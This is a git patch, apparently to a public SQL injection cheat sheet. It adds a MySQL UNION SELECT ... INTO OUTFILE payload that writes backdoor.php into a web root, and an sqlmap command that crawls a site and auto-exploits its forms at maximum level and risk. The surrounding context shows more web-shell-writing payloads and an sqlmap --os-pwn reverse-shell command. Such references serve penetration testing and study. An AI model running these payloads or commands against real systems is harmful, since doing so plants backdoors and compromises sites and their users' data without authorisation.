From 869b29195b5d0bad28a3b724b46f0c23535390ac Mon Sep 17 00:00:00 2001
From: Swissky
Date: Thu, 4 Oct 2018 19:59:11 +0200
Subject: [PATCH] SQLmap --crawl, --form
---
 SQL injection/MySQL Injection.md | 1 +
 SQL injection/README.md | 10 ++++++++++
 2 files changed, 11 insertions(+)
diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md
index 4b3e4f89..01430712 100644
--- a/SQL injection/MySQL Injection.md
+++ b/SQL injection/MySQL Injection.md
@@ -123,4 +123,5 @@ SELECT "" into outfile "C:\\xampp\\htdocs\\backdoo
 SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '
 -1 UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
 [...] UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
+[...] union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
 ```
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 29b6926f..e99c116a 100644
--- a/SQL injection/README.md
+++ b/SQL injection/README.md
@@ -138,6 +138,16 @@ Dropping a reverse-shell / meterpreter
 python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
 ```
+Crawl a website with SQLmap and auto-exploit
+
+```powershell
+sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
+
+--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
+--crawl = how deep you want to crawl a site
+--forms = Parse and test forms
+```
+
 Using TOR with SQLmap
 ```powershell